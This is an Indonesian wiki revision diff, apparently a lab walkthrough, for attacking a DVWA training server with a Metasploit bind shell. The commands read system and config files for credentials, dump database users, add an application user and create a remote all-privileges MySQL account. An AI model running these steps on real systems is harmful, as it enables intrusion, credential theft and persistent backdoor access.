Difference between revisions of "DVWA: Exploit menggunakan Metasploit"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) (New page: ==Persiapan== Masuk ke DVWA, misalnya http://192.168.0.80/DVWA-1.9 username admin password password Klik DVWA Security > Security Level Low > Submit) |
Onnowpurbo (talk | contribs) |
||
| Line 1: | Line 1: | ||
| + | Sumber: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html | ||
| + | |||
==Persiapan== | ==Persiapan== | ||
| Line 11: | Line 13: | ||
DVWA Security > Security Level Low > Submit | DVWA Security > Security Level Low > Submit | ||
| + | |||
| + | |||
| + | ==Gunakan metasploit== | ||
| + | |||
| + | Jalankan | ||
| + | |||
| + | msfconsole thankyou | ||
| + | |||
| + | Lakukan | ||
| + | |||
| + | |||
| + | use multi/handler | ||
| + | set PAYLOAD linux/x86/shell/bind_tcp | ||
| + | show options | ||
| + | set RHOST 192.168.0.80 | ||
| + | exploit | ||
| + | |||
| + | Cek password | ||
| + | |||
| + | whoami | ||
| + | grep apache /etc/passwd | ||
| + | grep apache /etc/group | ||
| + | |||
| + | |||
| + | Cek Password melalui konfigurasi Web | ||
| + | |||
| + | ps -eaf | grep http | ||
| + | pwd | ||
| + | ls -ld /var/www/html | ||
| + | ls -ld /var/www/html/DVWA* | ||
| + | ls -l /var/www/html/DVWA* | ||
| + | |||
| + | Cari password database | ||
| + | |||
| + | ls -l /var/www/html/dvwa/config | ||
| + | cat /var/www/html/dvwa/config/config.inc.php | ||
| + | |||
| + | Explorasi database | ||
| + | |||
| + | |||
| + | echo "show databases;" | mysql -uroot -pdvwaPASSWORD | ||
| + | echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD | ||
| + | echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD | ||
| + | echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD | ||
| + | |||
| + | Buat user baru | ||
| + | |||
| + | echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -pdvwaPASSWORD | ||
| + | echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD | ||
| + | |||
| + | Lihat informasi tabel MySQL | ||
| + | |||
| + | |||
| + | echo "show databases;" | mysql -uroot -pdvwaPASSWORD | ||
| + | echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD | ||
| + | |||
| + | Buat user MySQL yang baru | ||
| + | |||
| + | echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -pdvwaPASSWORD | ||
| + | echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD | ||
| + | |||
| + | |||
| + | |||
| + | |||
| + | |||
| + | ==Referensi== | ||
| + | |||
| + | * https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html | ||
Revision as of 10:07, 15 February 2016
Sumber: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html
Persiapan
Masuk ke DVWA, misalnya
http://192.168.0.80/DVWA-1.9
username admin password password
Klik
DVWA Security > Security Level Low > Submit
Gunakan metasploit
Jalankan
msfconsole thankyou
Lakukan
use multi/handler set PAYLOAD linux/x86/shell/bind_tcp show options set RHOST 192.168.0.80 exploit
Cek password
whoami grep apache /etc/passwd grep apache /etc/group
Cek Password melalui konfigurasi Web
ps -eaf | grep http pwd ls -ld /var/www/html ls -ld /var/www/html/DVWA* ls -l /var/www/html/DVWA*
Cari password database
ls -l /var/www/html/dvwa/config cat /var/www/html/dvwa/config/config.inc.php
Explorasi database
echo "show databases;" | mysql -uroot -pdvwaPASSWORD echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
Buat user baru
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
Lihat informasi tabel MySQL
echo "show databases;" | mysql -uroot -pdvwaPASSWORD echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD
Buat user MySQL yang baru
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -pdvwaPASSWORD echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD